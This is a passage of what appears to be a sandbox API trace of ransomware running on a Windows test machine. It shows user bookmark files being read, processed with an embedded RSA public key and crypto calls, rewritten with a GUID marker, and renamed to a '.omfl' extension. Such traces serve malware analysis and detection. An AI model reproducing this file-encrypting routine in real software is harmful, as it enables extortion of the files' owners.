lpMem=0xdcfa8c0 | out: hHeap=0x4970000) returned 1 [0132.632] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd171d8 | out: hHeap=0x4970000) returned 1 [0132.632] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cf168 | out: hHeap=0x4970000) returned 1 [0132.632] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd174c0 | out: hHeap=0x4970000) returned 1 [0132.632] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17490 | out: hHeap=0x4970000) returned 1 [0132.633] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17560 | out: hHeap=0x4970000) returned 1 [0132.633] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750ca48 | out: hHeap=0x4970000) returned 1 [0132.633] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24890 | out: hHeap=0x4970000) returned 1 [0132.633] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17478 | out: hHeap=0x4970000) returned 1 [0132.633] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49dbd00 | out: hHeap=0x4970000) returned 1 [0132.633] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd206b0 | out: hHeap=0x4970000) returned 1 [0132.633] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24260 | out: hHeap=0x4970000) returned 1 [0132.633] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757c4e0 | out: hHeap=0x4970000) returned 1 [0132.633] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7503670 | out: hHeap=0x4970000) returned 1 [0132.633] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cdf28 | out: hHeap=0x4970000) returned 1 [0132.633] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e18 | out: hHeap=0x4970000) returned 1 [0132.633] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cdbc8 | out: hHeap=0x4970000) returned 1 [0132.633] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd08ea8 | out: hHeap=0x4970000) returned 1 [0132.633] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e4b90 | out: hHeap=0x4970000) returned 1 [0132.633] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb28 | out: hHeap=0x4970000) returned 1 [0132.633] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0132.633] WriteFile (in: hFile=0x610, lpBuffer=0xdd14728*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0xe00fb14, lpOverlapped=0x0 | out: lpBuffer=0xdd14728*, lpNumberOfBytesWritten=0xe00fb14*=0x80, lpOverlapped=0x0) returned 1 [0132.633] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd14728 | out: hHeap=0x4970000) returned 1 [0132.633] SetFilePointerEx (in: hFile=0x610, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.633] WriteFile (in: hFile=0x610, lpBuffer=0xdd24578*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdd24578*, lpNumberOfBytesWritten=0xe00fb50*=0x100, lpOverlapped=0x0) returned 1 [0132.634] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24578 | out: hHeap=0x4970000) returned 1 [0132.634] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5dc0 [0132.634] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x428) returned 0xdd19550 [0132.634] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH", cchWideChar=-1, lpMultiByteStr=0xdd19550, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH", lpUsedDefaultChar=0x0) returned 41 [0132.634] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x430) returned 0x757b548 [0132.634] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd19550 | out: hHeap=0x4970000) returned 1 [0132.634] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5dc0 | out: hHeap=0x4970000) returned 1 [0132.634] WriteFile (in: hFile=0x610, lpBuffer=0x757b548*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0x757b548*, lpNumberOfBytesWritten=0xe00fb50*=0x28, lpOverlapped=0x0) returned 1 [0132.634] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757b548 | out: hHeap=0x4970000) returned 1 [0132.634] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0132.634] WriteFile (in: hFile=0x610, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0xe00fb50*=0x26, lpOverlapped=0x0) returned 1 [0132.634] CloseHandle (hObject=0x610) returned 1 [0132.652] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xb0) returned 0x74f82a0 [0132.652] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8b0) returned 0x74fb288 [0132.652] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74f82a0 | out: hHeap=0x4970000) returned 1 [0132.652] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at work.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at work.url.omfl")) returned 1 [0132.653] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74fb288 | out: hHeap=0x4970000) returned 1 [0132.653] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0132.653] VirtualFree (lpAddress=0x6ec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0132.655] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e6bb8 | out: hHeap=0x4970000) returned 1 [0132.655] FindNextFileW (in: hFindFile=0xdce3b70, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x86, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft Store.url", cAlternateFileName="MICROS~1.URL")) returned 1 [0132.655] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d2e68 [0132.655] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xbe) returned 0x74e6bb8 [0132.655] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d2e68 | out: hHeap=0x4970000) returned 1 [0132.655] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url") returned=".url" [0132.655] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft store.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0132.705] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=134) returned 1 [0132.705] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0132.712] SetFilePointerEx (in: hFile=0x610, liDistanceToMove=0x60, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.712] ReadFile (in: hFile=0x610, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0xe00fb78, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb78*=0x26, lpOverlapped=0x0) returned 1 [0132.713] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb60 [0132.713] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0132.714] SetFilePointer (in: hFile=0x610, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.714] ReadFile (in: hFile=0x610, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0xe00fb70, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb70*=0x86, lpOverlapped=0x0) returned 1 [0132.714] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0132.714] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1ef) returned 0xdd0bd00 [0132.714] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0132.714] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0132.714] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d2e68) returned 1 [0132.715] CryptCreateHash (in: hProv=0x49d2e68, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0132.715] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0132.715] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0132.715] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x11) returned 0x74cdf28 [0132.715] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0132.715] GetLastError () returned 0x0 [0132.715] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0132.715] CryptReleaseContext (hProv=0x49d2e68, dwFlags=0x0) returned 1 [0132.716] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0132.716] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0132.716] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0132.716] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb28 [0132.716] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0132.716] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0132.716] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb60 [0132.716] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x90) returned 0xdd14728 [0132.716] SetFilePointer (in: hFile=0x610, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0132.716] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb28 | out: hHeap=0x4970000) returned 1 [0132.716] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1f0) returned 0xdd0bd00 [0132.716] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb28 [0132.716] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1f0) returned 0x74e4b90 [0132.716] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x58) returned 0xdd08ea8 [0132.716] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0x49dbd00 [0132.716] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd17478 [0132.716] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0x49dbd48 [0132.716] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd17490 [0132.716] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd174c0 [0132.716] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd171d8 [0132.716] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd174d8 [0132.716] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x24) returned 0xdd0d930 [0132.716] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x158) returned 0xdd27968 [0132.716] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0xdd27968, Size=0x218) returned 0xdd206b0 [0132.716] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x558) returned 0xdce69c8 [0132.717] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd174c0 | out: hHeap=0x4970000) returned 1 [0132.717] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd174d8 | out: hHeap=0x4970000) returned 1 [0132.717] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd171d8 | out: hHeap=0x4970000) returned 1 [0132.717] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0d930 | out: hHeap=0x4970000) returned 1 [0132.717] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce69c8 | out: hHeap=0x4970000) returned 1 [0132.717] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd171d8 [0132.717] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e18 [0132.717] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd174d8 [0132.717] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x18) returned 0x74cdbc8 [0132.717] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x9) returned 0xdd174c0 [0132.717] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e38 [0132.717] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10e) returned 0x74e3210 [0132.717] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8f58 [0132.717] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x58) returned 0xdd08cc8 [0132.717] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cdf28 [0132.717] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x104) returned 0x7503670 [0132.717] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cf168 [0132.717] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0132.717] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0132.717] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd174d8 | out: hHeap=0x4970000) returned 1 [0132.717] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e38 | out: hHeap=0x4970000) returned 1 [0132.717] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd174c0 | out: hHeap=0x4970000) returned 1 [0132.717] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cdbc8 | out: hHeap=0x4970000) returned 1 [0132.717] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e18 | out: hHeap=0x4970000) returned 1 [0132.717] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd171d8 | out: hHeap=0x4970000) returned 1 [0132.718] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8f58 | out: hHeap=0x4970000) returned 1 [0132.718] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd08ea8 | out: hHeap=0x4970000) returned 1 [0132.718] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd206b0 | out: hHeap=0x4970000) returned 1 [0132.718] GetCurrentThreadId () returned 0x618 [0132.718] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24578 [0132.718] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x82) returned 0x7579dd0 [0132.718] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x2c) returned 0x750ca48 [0132.718] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d2e68 [0132.718] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x148) returned 0xdd17560 [0132.718] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e18 [0132.718] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e38 [0132.718] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24260 [0132.718] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0132.718] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0132.718] GetCurrentThreadId () returned 0x618 [0132.718] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0132.718] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0132.718] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xeb) returned 0x74e3210 [0132.718] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0132.718] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0132.718] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0132.718] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0132.718] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0132.718] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24890 [0132.718] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e18 | out: hHeap=0x4970000) returned 1 [0132.718] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4c) returned 0x757c4e0 [0132.719] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e18 [0132.719] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24680 [0132.719] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e58 [0132.719] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd171d8 [0132.719] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e58 | out: hHeap=0x4970000) returned 1 [0132.719] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e58 [0132.719] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e78 [0132.719] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8c0 [0132.719] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8b0 [0132.719] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8a0 [0132.719] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8e0 [0132.719] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa860 [0132.719] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd174c0 [0132.719] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e78 | out: hHeap=0x4970000) returned 1 [0132.719] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e78 [0132.719] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e58 | out: hHeap=0x4970000) returned 1 [0132.719] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e58 [0132.719] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8d0 [0132.719] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8f0 [0132.719] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa890 [0132.719] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd174d8 [0132.719] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8f0 | out: hHeap=0x4970000) returned 1 [0132.719] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x18) returned 0x74cdbc8 [0132.719] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8d0 | out: hHeap=0x4970000) returned 1 [0132.719] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd174a8 [0132.719] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa890 | out: hHeap=0x4970000) returned 1 [0132.719] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd17178 [0132.720] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e58 | out: hHeap=0x4970000) returned 1 [0132.720] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e58 [0132.720] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8e0 | out: hHeap=0x4970000) returned 1 [0132.720] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd17208 [0132.720] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e58 | out: hHeap=0x4970000) returned 1 [0132.720] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16968 [0132.720] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8c0 | out: hHeap=0x4970000) returned 1 [0132.720] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd174f0 [0132.720] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17208 | out: hHeap=0x4970000) returned 1 [0132.720] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd17208 [0132.720] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16968 | out: hHeap=0x4970000) returned 1 [0132.720] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0xdcfa8c0 [0132.720] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e18 | out: hHeap=0x4970000) returned 1 [0132.720] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cf128 [0132.720] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8c0 | out: hHeap=0x4970000) returned 1 [0132.720] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1c) returned 0xdce8f58 [0132.720] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd174c0 | out: hHeap=0x4970000) returned 1 [0132.720] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd174c0 [0132.720] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e78 | out: hHeap=0x4970000) returned 1 [0132.720] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x204) returned 0xdd206b0 [0132.720] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd171d8 | out: hHeap=0x4970000) returned 1 [0132.720] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x108) returned 0x7503788 [0132.720] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17208 | out: hHeap=0x4970000) returned 1 [0132.720] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x210) returned 0xdce0a50 [0132.720] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8f58 | out: hHeap=0x4970000) returned 1 [0132.720] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10c) returned 0x74e3210 [0132.721] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8b0 | out: hHeap=0x4970000) returned 1 [0132.721] RtlAllocateHeap 